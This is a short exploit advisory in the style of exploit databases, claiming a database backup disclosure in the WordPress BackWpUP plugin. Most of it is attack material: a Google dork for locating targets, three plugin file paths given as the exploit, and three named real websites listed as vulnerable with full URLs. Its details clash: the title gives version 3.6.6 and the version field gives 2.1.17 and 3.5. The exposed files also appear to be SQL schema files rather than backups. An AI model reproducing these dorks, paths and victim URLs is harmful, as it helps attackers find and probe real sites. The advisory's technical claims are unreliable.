################################################################################################# # Exploit Title : WordPress BackWpUP Plugins 3.6.6 Database Backup Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 02/12/2018 # Vendor Homepage : wordpress.org/plugins/backwpup/ # Software Download Link : downloads.wordpress.org/plugin/backwpup.3.6.6.zip # Software Price : $244 # Tested On : Windows and Linux # Category : WebApps # Version Information : 2.1.17 and 3.5 # Google Dorks : inurl:''/wp-content/plugins/backwpup/libs/'' # Exploit Risk : Medium # CxSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018110204 # Exploit4Arab Exploit Link : exploit4arab.org/exploits/2266 # ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31534 # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] ################################################################################################# # Admin Panel Login Path : /wp-login.php # Exploit : /wp-content/plugins/backwpup/libs/aws/lib/cachecore/_sql/mysql.sql /wp-content/plugins/backwpup/libs/aws/lib/cachecore/_sql/pgsql.sql /wp-content/plugins/backwpup/libs/aws/lib/cachecore/_sql/sqlite3.sql ################################################################################################# # Example Vulnerable Sites => [+] ethelscottage.com.au/wp-content/plugins/backwpup/libs/aws/lib/cachecore/_sql/sqlite3.sql [+] bon.co.th/bon-wp/wp-content/plugins/backwpup/libs/aws/lib/cachecore/_sql/sqlite3.sql [+] ujsafety.co.il/wp-content/plugins/backwpup/libs/aws/lib/cachecore/_sql/sqlite3.sql ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################